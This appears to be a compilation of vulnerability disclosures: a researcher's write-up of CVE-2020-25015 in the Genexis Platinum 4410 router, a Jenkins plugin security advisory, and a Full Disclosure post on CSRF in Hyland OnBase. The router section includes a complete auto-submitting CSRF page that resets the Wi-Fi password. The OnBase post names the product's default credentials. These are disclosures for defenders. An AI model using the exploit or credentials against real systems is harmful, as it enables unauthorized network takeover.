A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password.

While testing the Genexis Platinum 4410 home router version 2.1 (software version P4410-V2-1.28), I was able to find that the router is vulnerable to Broken Access Control and CSRF.

**CVE ID:** CVE-2020-25015

****Summary****

Platinum 4410 is a compact router from Genexis that is commonly used at homes. Hardware version V2.1 – Software version P4410-V2-1.28 was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password.

> Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification or destruction of all data, or performing a business function outside of the limits of the user.
> 
> _—_ OWASP

For more information on CSRF, please visit this article.

**Impact**

An attacker can send the victim a link, which if he clicks while he is connected to the WIFI network established from the vulnerable router, the password of the WIFI access point will get changed via CSRF exploit. As the router is also vulnerable to Broken Access Control, the victim does not need to be logged in to the router’s web-based setup page (192.168.1.1), essentially making this a one-click hack.

**Vulnerability**

Ideally, this attack would be troublesome because for a CSRF attack to be successful, it requires the victim to be logged in to the application that is under the attack (in this case, the web-based setup page at 192.168.1.1) and most router setup pages ends user sessions automatically. Additionally, it is rarely that customers visit their router’s setup page as well. However, due to the broken access control vulnerability in the latest version of the firmware at the time of reporting, the request to change password could be sent by unauthenticated parties as well.

Thus combining the CSRF and Broken Access Control vulnerabilities on this version of the firmware, an attacker can create an HTML document with the following code and bait the user into submitting it.

    <html>
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://192.168.1.1/cgi-bin/net-wlan.asp" method="POST">
          <input type="hidden" name="wlEnbl" value="ON" />
          <input type="hidden" name="hwlKeys0" value="" />
          <input type="hidden" name="hwlKeys1" value="" />
          <input type="hidden" name="hwlKeys2" value="" />
          <input type="hidden" name="hwlKeys3" value="" />
          <input type="hidden" name="hwlgMode" value="9" />
          <input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" />
          <input type="hidden" name="hwlEnbl" value="1" />
          <input type="hidden" name="hWPSMode" value="1" />
          <input type="hidden" name="henableSsid" value="1" />
          <input type="hidden" name="hwlHide" value="0" />
          <input type="hidden" name="isInWPSing" value="0" />
          <input type="hidden" name="WpsConfModeAll" value="7" />
          <input type="hidden" name="WpsConfModeNone" value="0" />
          <input type="hidden" name="hWpsStart" value="0" />
          <input type="hidden" name="isCUCSupport" value="0" />
          <input type="hidden" name="SSIDPre" value="N&#47;A" />
          <input type="hidden" name="bwControlhidden" value="0" />
          <input type="hidden" name="ht&#95;bw" value="1" />
          <input type="hidden" name="wlgMode" value="b&#44;g&#44;n" />
          <input type="hidden" name="wlChannel" value="0" />
          <input type="hidden" name="wlTxPwr" value="1" />
          <input type="hidden" name="wlSsidIdx" value="0" />
          <input type="hidden" name="SSID&#95;Flag" value="0" />
          <input type="hidden" name="wlSsid" value="JINSON" />
          <input type="hidden" name="wlMcs" value="33" />
          <input type="hidden" name="bwControl" value="1" />
          <input type="hidden" name="giControl" value="1" />
          <input type="hidden" name="enableSsid" value="on" />
          <input type="hidden" name="wlAssociateNum" value="32" />
          <input type="hidden" name="wlSecurMode" value="WPAand11i" />
          <input type="hidden" name="wlPreauth" value="off" />
          <input type="hidden" name="wlNetReauth" value="1" />
          <input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" />
          <input type="hidden" name="cb&#95;enablshowpsw" value="on" />
          <input type="hidden" name="wlWpaGtkRekey" value="" />
          <input type="hidden" name="wlRadiusIPAddr" value="" />
          <input type="hidden" name="wlRadiusPort" value="" />
          <input type="hidden" name="wlRadiusKey" value="" />
          <input type="hidden" name="wlWpa" value="TKIPAES" />
          <input type="hidden" name="wlKeyBit" value="64" />
          <input type="hidden" name="wlKeys" value="" />
          <input type="hidden" name="wlKeys" value="" />
          <input type="hidden" name="wlKeys" value="" />
          <input type="hidden" name="wlKeys" value="" />
          <input type="hidden" name="WpsActive" value="0" />
          <input type="hidden" name="wpsmode" value="ap&#45;pbc" />
          <input type="hidden" name="pinvalue" value="" />
          <input type="hidden" name="Save&#95;Flag" value="1" />
          <input type="submit" value="Submit request" />
        </form>
         <script>
          document.forms[0].submit();
        </script>
      </body>
    </html>
    

As long as the victim is connected to the WiFi access point established by the affected router, the password of the access point would get changed as shown in the below video.

****Timeline****

*   Vulnerability reported to the Genexis team on August 28, 2020
*   Team confirmed firmware release containing fix on September 14, 2020

****Recommendation****

*   As per the Genexis team, customers should contact their ISP in order to get access to the latest firmware.
*   Use a more secure router if you are unable to upgrade the firmware.

**Reference**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25015
*   https://nvd.nist.gov/vuln/detail/CVE-2020-25015

Tags: broken access control, CSRF, genexis, genexis platinum 4410, genexis routers, owasp, owasp top 10, router, vulnerability

**Jinson Varghese**

Jinson Varghese Behanan is an Information Security Analyst at Astra. Passionate about Cybersecurity from a young age, Jinson completed his Bachelor's degree in Computer Security from Northumbria University. When he isn’t glued to a computer screen, he spends his time reading InfoSec materials, playing basketball, learning French and traveling. You can follow him on Medium or visit his Website for more stories about the various Security Audits he does and the crazy vulnerabilities he finds.

CVE-2020-25015: Genexis Platinum 4410 Router - Broken Access Control, CSRF

Jenkins Pipeline Maven Integration Plugin 3.9.2 and earlier does not escape the upstream job's display name shown as part of a build cause, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   android-lint Plugin
*   Blue Ocean Plugin
*   chosen-views-tabbar Plugin
*   ClearCase Release Plugin
*   computer-queue-plugin Plugin
*   Copy data to workspace Plugin
*   Coverage/Complexity Scatter Plot Plugin
*   Custom Job Icon Plugin
*   Description Column Plugin
*   ElasTest Plugin
*   Email Extension Plugin
*   Health Advisor by CloudBees Plugin
*   Locked Files Report Plugin
*   Mailer Plugin
*   MongoDB Plugin
*   Perfecto Plugin
*   Pipeline Maven Integration Plugin
*   Radiator View Plugin
*   Selection tasks Plugin
*   Storable Configs Plugin
*   Validating String Parameter Plugin

**Descriptions****Missing hostname validation in Mailer Plugin**

**SECURITY-1813 / CVE-2020-2252**  
**Severity (CVSS):** Medium  
**Affected plugin: mailer**  
**Description:**

Mailer Plugin 1.32 and earlier does not perform hostname validation when connecting to the configured SMTP server. This lack of validation could be abused using a man-in-the-middle attack to intercept these connections.

Mailer Plugin 1.32.1 validates the SMTP hostname when connecting via TLS by default. In Mailer Plugin 1.32 and earlier, administrators can set the Java system property mail.smtp.ssl.checkserveridentity to true on startup to enable this protection.

In case of problems, this protection can be disabled again by setting the Java system property mail.smtp.ssl.checkserveridentity to false on startup.

**Missing hostname validation in Email Extension Plugin**

**SECURITY-1851 / CVE-2020-2253**  
**Severity (CVSS):** Medium  
**Affected plugin: email-ext**  
**Description:**

Email Extension Plugin 2.75 and earlier does not perform hostname validation when connecting to the configured SMTP server. This lack of validation could be abused using a man-in-the-middle attack to intercept these connections.

Email Extension Plugin 2.76 validates the SMTP hostname when connecting via TLS by default. In Email Extension Plugin 2.75 and earlier, administrators can set the Java system property mail.smtp.ssl.checkserveridentity to true on startup to enable this protection. Alternatively, this protection can be enabled (or disabled in the new version) via the 'Advanced Email Properties' field in the plugin’s configuration in Configure System.

In case of problems, this protection can be disabled again by setting mail.smtp.ssl.checkserveridentity to false using either method.

**Path traversal vulnerability in Blue Ocean Plugin**

**SECURITY-1956 / CVE-2020-2254**  
**Severity (CVSS):** Medium  
**Affected plugin: blueocean**  
**Description:**

Blue Ocean Plugin 1.23.2 and earlier provides an undocumented feature flag, blueocean.features.GIT_READ_SAVE_TYPE, that when set to the value clone allows an attacker with Item/Configure or Item/Create permission to read arbitrary files on the Jenkins controller file system.

Blue Ocean Plugin 1.23.3 no longer includes this feature and redirects existing usage to a safer alternative.

**Missing permission check in Blue Ocean Plugin**

**SECURITY-1961 / CVE-2020-2255**  
**Severity (CVSS):** Medium  
**Affected plugin: blueocean**  
**Description:**

**Updated 2020-09-16:** _This entry previously misidentified the problematic behavior. The HTTP request itself is legitimate, but only authorized users should be able to perform it._

Blue Ocean Plugin 1.23.2 and earlier does not perform permission checks in several HTTP endpoints implementing connection tests.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL.

Blue Ocean Plugin 1.23.3 requires Item/Create permission to perform these connection tests.

**Stored XSS vulnerability in upstream cause in Pipeline Maven Integration Plugin**

**SECURITY-1976 / CVE-2020-2256**  
**Severity (CVSS):** High  
**Affected plugin: pipeline-maven**  
**Description:**

Pipeline Maven Integration Plugin 3.9.2 and earlier does not escape the upstream job’s display name shown as part of a build cause.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

Pipeline Maven Integration Plugin 3.9.3 escapes upstream job names in build causes.

**Stored XSS vulnerability in Validating String Parameter Plugin**

**SECURITY-1935 / CVE-2020-2257**  
**Severity (CVSS):** High  
**Affected plugin: validating-string-parameter**  
**Description:**

Validating String Parameter Plugin 2.4 and earlier does not escape regular expressions in tooltips. Additionally, Validating String Parameter Plugin 2.4 does not escape parameter names and parameter descriptions.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

Validating String Parameter Plugin 2.5 escapes regular expressions in tooltips and parameter names. Parameter descriptions are rendered using the configured markup formatter.

**Incorrect permission check in Health Advisor by CloudBees Plugin**

**SECURITY-1998 / CVE-2020-2258**  
**Severity (CVSS):** Medium  
**Affected plugin: cloudbees-jenkins-advisor**  
**Description:**

Health Advisor by CloudBees Plugin 3.2.0 and earlier does not correctly perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to view an administrative configuration page.

Health Advisor by CloudBees Plugin 3.2.1 requires Overall/Administer to view its administrative configuration page.

**Stored XSS vulnerability in computer-queue-plugin Plugin**

**SECURITY-1912 / CVE-2020-2259**  
**Severity (CVSS):** High  
**Affected plugin: computer-queue-plugin**  
**Description:**

computer-queue-plugin Plugin 1.5 and earlier does not escape the agent name in tooltips.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure permission.

computer-queue-plugin Plugin 1.6 escapes the agent name in tooltips.

**Missing permission check in Perfecto Plugin**

**SECURITY-1979 / CVE-2020-2260**  
**Severity (CVSS):** Medium  
**Affected plugin: perfecto**  
**Description:**

Perfecto Plugin 1.17 and earlier does not perform a permission check in a method implementing a connection test.

This allows attackers with Overall/Read permission to connect to an attacker-specified HTTP URL using attacker-specified username and password.

Perfecto Plugin 1.18 requires Overall/Administer permission to perform a connection test.

**OS command execution vulnerability in Perfecto Plugin**

**SECURITY-1980 / CVE-2020-2261**  
**Severity (CVSS):** High  
**Affected plugin: perfecto**  
**Description:**

Perfecto Plugin allows specifying Perfecto Connect Path and Perfecto Connect File Name in job configurations.

This command is executed on the Jenkins controller in Perfecto Plugin 1.17 and earlier, allowing attackers with Job/Configure permission to run arbitrary commands on the Jenkins controller.

Perfecto Plugin 1.18 executes the specified commands on the agent the build is running on.

**Stored XSS vulnerability in android-lint Plugin**

**SECURITY-1908 / CVE-2020-2262**  
**Severity (CVSS):** High  
**Affected plugin: android-lint**  
**Description:**

android-lint Plugin 2.6 and earlier does not escape the annotation message in tooltips.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to provide report files to the 'Publish Android Lint results' post-build step.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in Radiator View Plugin**

**SECURITY-1927 / CVE-2020-2263**  
**Severity (CVSS):** High  
**Affected plugin: radiatorviewplugin**  
**Description:**

Radiator View Plugin 1.29 and earlier does not escape the full name of the jobs in tooltips.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in Custom Job Icon Plugin**

**SECURITY-1914 / CVE-2020-2264**  
**Severity (CVSS):** High  
**Affected plugin: custom-job-icon**  
**Description:**

Custom Job Icon Plugin 0.2 and earlier does not escape the job descriptions in tooltips.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in Coverage/Complexity Scatter Plot Plugin**

**SECURITY-1913 / CVE-2020-2265**  
**Severity (CVSS):** High  
**Affected plugin: covcomplplot**  
**Description:**

Coverage/Complexity Scatter Plot Plugin 1.1.1 and earlier does not escape the method information in tooltips.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to provide report files to the 'Publish Coverage / Complexity Scatter Plot' post-build step.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in Description Column Plugin**

**SECURITY-1916 / CVE-2020-2266**  
**Severity (CVSS):** High  
**Affected plugin: description-column-plugin**  
**Description:**

Description Column Plugin 1.3 and earlier does not escape the job description in the column tooltips.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission checks in MongoDB Plugin**

**SECURITY-1904 / CVE-2020-2267 (missing permission check), CVE-2020-2268 (CSRF)**  
**Severity (CVSS):** Medium  
**Affected plugin: mongodb**  
**Description:**

MongoDB Plugin 1.3 and earlier does not perform permission checks in methods implementing form validation.

This allows attackers with Overall/Read permission to gain access to some metadata of any arbitrary files on the Jenkins controller.

Additionally, these form validation methods do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in chosen-views-tabbar Plugin**

**SECURITY-1869 / CVE-2020-2269**  
**Severity (CVSS):** High  
**Affected plugin: chosen-views-tabbar**  
**Description:**

chosen-views-tabbar Plugin 1.2 and earlier does not escape view names in the dropdown to select views.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with the ability to configure views.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in ClearCase Release Plugin**

**SECURITY-1911 / CVE-2020-2270**  
**Severity (CVSS):** High  
**Affected plugin: clearcase-release**  
**Description:**

ClearCase Release Plugin 0.3 and earlier does not escape the composite baseline in badge tooltip.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in Locked Files Report Plugin**

**SECURITY-1921 / CVE-2020-2271**  
**Severity (CVSS):** High  
**Affected plugin: locked-files-report**  
**Description:**

Locked Files Report Plugin 1.6 and earlier does not escape locked files' names in tooltips.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission checks in ElasTest Plugin**

**SECURITY-1903 / CVE-2020-2272 (missing permission check), CVE-2020-2273 (CSRF)**  
**Severity (CVSS):** Medium  
**Affected plugin: elastest**  
**Description:**

ElasTest Plugin 1.2.1 and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.

**Passwords stored in plain text by ElasTest Plugin**

**SECURITY-2014 / CVE-2020-2274**  
**Severity (CVSS):** Low  
**Affected plugin: elastest**  
**Description:**

ElasTest Plugin 1.2.1 and earlier stores its server password in plain text in the global configuration file jenkins.plugins.elastest.ElasTestInstallation.xml. This password can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Arbitrary file read vulnerability in Copy data to workspace Plugin**

**SECURITY-1966 / CVE-2020-2275**  
**Severity (CVSS):** Medium  
**Affected plugin: copy-data-to-workspace-plugin**  
**Description:**

Copy data to workspace Plugin allows users to copy files from the Jenkins controller to job workspaces.

Copy data to workspace Plugin 1.0 and earlier does not limit which directories can be copied. This allows attackers with Job/Configure permission to read arbitrary files on the Jenkins controller.

As of publication of this advisory, there is no fix.

**System command execution vulnerability in Selection tasks Plugin**

**SECURITY-1967 / CVE-2020-2276**  
**Severity (CVSS):** High  
**Affected plugin: selection-tasks-plugin**  
**Description:**

Selection tasks Plugin implements a job parameter that dynamically generates possible values from the output of a program. The path to that program is specified as part of the parameter configuration.

Selection tasks Plugin 1.0 and earlier executes this user-specified program on the Jenkins controller. This allows attackers with Job/Configure permission to execute an arbitrary system command on the Jenkins controller as the OS user that the Jenkins process is running as.

As of publication of this advisory, there is no fix.

**Arbitrary file read vulnerability in Storable Configs Plugin**

**SECURITY-1968 (1) / CVE-2020-2277**  
**Severity (CVSS):** Medium  
**Affected plugin: storable-configs-plugin**  
**Description:**

Storable Configs Plugin 1.0 and earlier allows users with Job/Read permission to read arbitrary files on the Jenkins controller.

As of publication of this advisory, there is no fix.

**Arbitrary file write vulnerability in Storable Configs Plugin**

**SECURITY-1968 (2) / CVE-2020-2278**  
**Severity (CVSS):** Medium  
**Affected plugin: storable-configs-plugin**  
**Description:**

Storable Configs Plugin allows storing copies of a job’s config.xml file on the Jenkins controller with a user-specified file name.

Storable Configs Plugin 1.0 and earlier does not restrict the user-specified file name, except that a .xml suffix is added if it’s not already present. This allows attackers with Job/Configure permission to replace any other .xml file on the Jenkins controller with the job’s config.xml file’s content.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-1813: Medium
*   SECURITY-1851: Medium
*   SECURITY-1869: High
*   SECURITY-1903: Medium
*   SECURITY-1904: Medium
*   SECURITY-1908: High
*   SECURITY-1911: High
*   SECURITY-1912: High
*   SECURITY-1913: High
*   SECURITY-1914: High
*   SECURITY-1916: High
*   SECURITY-1921: High
*   SECURITY-1927: High
*   SECURITY-1935: High
*   SECURITY-1956: Medium
*   SECURITY-1961: Medium
*   SECURITY-1966: Medium
*   SECURITY-1967: High
*   SECURITY-1968 (1): Medium
*   SECURITY-1968 (2): Medium
*   SECURITY-1976: High
*   SECURITY-1979: Medium
*   SECURITY-1980: High
*   SECURITY-1998: Medium
*   SECURITY-2014: Low

**Affected Versions**

*   **android-lint Plugin** up to and including 2.6
*   **Blue Ocean Plugin** up to and including 1.23.2
*   **chosen-views-tabbar Plugin** up to and including 1.2
*   **ClearCase Release Plugin** up to and including 0.3
*   **computer-queue-plugin Plugin** up to and including 1.5
*   **Copy data to workspace Plugin** up to and including 1.0
*   **Coverage/Complexity Scatter Plot Plugin** up to and including 1.1.1
*   **Custom Job Icon Plugin** up to and including 0.2
*   **Description Column Plugin** up to and including 1.3
*   **ElasTest Plugin** up to and including 1.2.1
*   **Email Extension Plugin** up to and including 2.75
*   **Health Advisor by CloudBees Plugin** up to and including 3.2.0
*   **Locked Files Report Plugin** up to and including 1.6
*   **Mailer Plugin** up to and including 1.32
*   **MongoDB Plugin** up to and including 1.3
*   **Perfecto Plugin** up to and including 1.17
*   **Pipeline Maven Integration Plugin** up to and including 3.9.2
*   **Radiator View Plugin** up to and including 1.29
*   **Selection tasks Plugin** up to and including 1.0
*   **Storable Configs Plugin** up to and including 1.0
*   **Validating String Parameter Plugin** up to and including 2.4

**Fix**

*   **Blue Ocean Plugin** should be updated to version 1.23.3
*   **computer-queue-plugin Plugin** should be updated to version 1.6
*   **Email Extension Plugin** should be updated to version 2.76
*   **Health Advisor by CloudBees Plugin** should be updated to version 3.2.1
*   **Mailer Plugin** should be updated to version 1.32.1
*   **Perfecto Plugin** should be updated to version 1.18
*   **Pipeline Maven Integration Plugin** should be updated to version 3.9.3
*   **Validating String Parameter Plugin** should be updated to version 2.5

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   android-lint Plugin
*   chosen-views-tabbar Plugin
*   ClearCase Release Plugin
*   Copy data to workspace Plugin
*   Coverage/Complexity Scatter Plot Plugin
*   Custom Job Icon Plugin
*   Description Column Plugin
*   ElasTest Plugin
*   Locked Files Report Plugin
*   MongoDB Plugin
*   Radiator View Plugin
*   Selection tasks Plugin
*   Storable Configs Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-1966, SECURITY-1967, SECURITY-1968 (1), SECURITY-1968 (2), SECURITY-1976
*   **Jinchen Sheng, Ant Security FG Lab.** for SECURITY-1956, SECURITY-1961
*   **Matt Sicker, CloudBees, Inc.** for SECURITY-1998
*   **Peter Stöckli (via Github Security Lab)** for SECURITY-1813
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-1869, SECURITY-1903, SECURITY-1904, SECURITY-1908, SECURITY-1911, SECURITY-1912, SECURITY-1913, SECURITY-1914, SECURITY-1916, SECURITY-1921, SECURITY-1927, SECURITY-2014
*   **Wadeck Follonier, CloudBees, Inc. and Daniel Beck, CloudBees, Inc.** for SECURITY-1935

CVE-2020-2256: Jenkins Security Advisory 2020-09-16

Jenkins Radiator View Plugin 1.29 and earlier does not escape the full name of the jobs in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

CVE-2020-2263: Jenkins Security Advisory 2020-09-16

Jenkins Custom Job Icon Plugin 0.2 and earlier does not escape the job descriptions in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

CVE-2020-2264: Jenkins Security Advisory 2020-09-16

Jenkins Validating String Parameter Plugin 2.4 and earlier does not escape various user-controlled fields, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

CVE-2020-2257: Jenkins Security Advisory 2020-09-16

Jenkins Android Lint Plugin 2.6 and earlier does not escape the annotation message in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to provide report files to the plugin's post-build step.

CVE-2020-2262: Jenkins Security Advisory 2020-09-16

Jenkins Coverage/Complexity Scatter Plot Plugin 1.1.1 and earlier does not escape the method information in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to provide report files to the plugin's post-build step.

CVE-2020-2265: Jenkins Security Advisory 2020-09-16

Jenkins computer-queue-plugin Plugin 1.5 and earlier does not escape the agent name in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure permission.

CVE-2020-2259: Jenkins Security Advisory 2020-09-16

Jenkins Description Column Plugin 1.3 and earlier does not escape the job description in the column tooltip, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

CVE-2020-2266: Jenkins Security Advisory 2020-09-16

An issue was discovered in Hyland OnBase through 16.0.2.83 and below, 17.0.2.109 and below, 18.0.0.37 and below, 19.8.16.1000 and below and 20.3.10.1000 and below. CSRF can be used to log in a user, and then perform actions, because there are default credentials (the wstinol password for the manager or hsi account).

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: Adaptive Security Consulting via Fulldisclosure <fulldisclosure () seclists org>  
_Date_: Wed, 02 Sep 2020 15:08:54 +0000  

CVSSv3.1 Score
-------------------------------------------------
AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Vendor
-------------------------------------------------
Hyland Software - (https://www.hyland.com/en/ and https://www.onbase.com/en/)

Product
-------------------------------------------------
Hyland OnBase
All derivatives based on OnBase

Versions Affected
-------------------------------------------------
All versions up to and prior to OnBase Foundation EP1 (tested: 19.8.9.1000) and OnBase 18 (tested: 18.0.0.32). OnBase 
Foundation EP2 and OnBase Foundation EP3 were not available to test, but Hyland's response indicates that they are not 
likely to have fixed the vulnerability.

Credit
-------------------------------------------------
Adaptive Security Consulting

Vulnerability Summary
-------------------------------------------------
Hyland OnBase's web client allows cross-site request forgery on the login page allowing an attacker to authenticate a 
user utilizing known credentials, allowing the attacker to gather data about the user, perform spoofing, and other 
activities.

Technical Details
-------------------------------------------------
Hyland OnBase's web login process fails to utilize a CSRF token, allowing an attacker to authenticate a victim 
utilizing attacker-known credentials (such as the default credentials "manager:wstinol" and "hsi:wstinol") when not 
using federated authentication. Once authenticated, the victim would be performing actions on-behalf of the attacker or 
the attacker can leverage the XSSi vulnerabilities to extract data from OnBase remotely, bypassing cross origin 
policies.

Solution
-------------------------------------------------
Unfortunately, attempts to notify Hyland of the vulnerabilities have been rebuffed as not being something that they 
have to fix since fixing vulnerabilities, according to the Director of Application Security, is "creating custom code" 
and no known fix is in place. It is recommended that users utilize federated authentication or, failing that, strong 
credential management processes to mitigate the risk of exploitation, and ensure that all default credentials are 
changed.

Timeline
-------------------------------------------------
07 May 2019 - Adaptive Security Consulting discovered a series of vulnerabilities in medical records management and 
search applications being considered by our client
15 May 2019 - The client was provided with the results of the assessment, including POCs for a number of high and 
critical vulnerabilities
12 July 2019 - Client asked for more information and demonstrations
01 October 2019 - Client asked to test latest version of Hyland software
15 October 2019 - Client was informed that EP1 contained many of the same vulnerabilities
March 2020 - Client contacted Hyland and spoke with the Director of Application Security who said that fixing 
vulnerabilities was "writing custom code" and that Hyland "doesn't write custom code"
21 April 2020 - Adaptive Security Consulting attempted to contact Hyland's Application Security Team via email on 
behalf of client, but attempts were ignored

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Hyland OnBase 19.x and below - CSRF** _Adaptive Security Consulting via Fulldisclosure (Sep 04)_

Tag

#csrf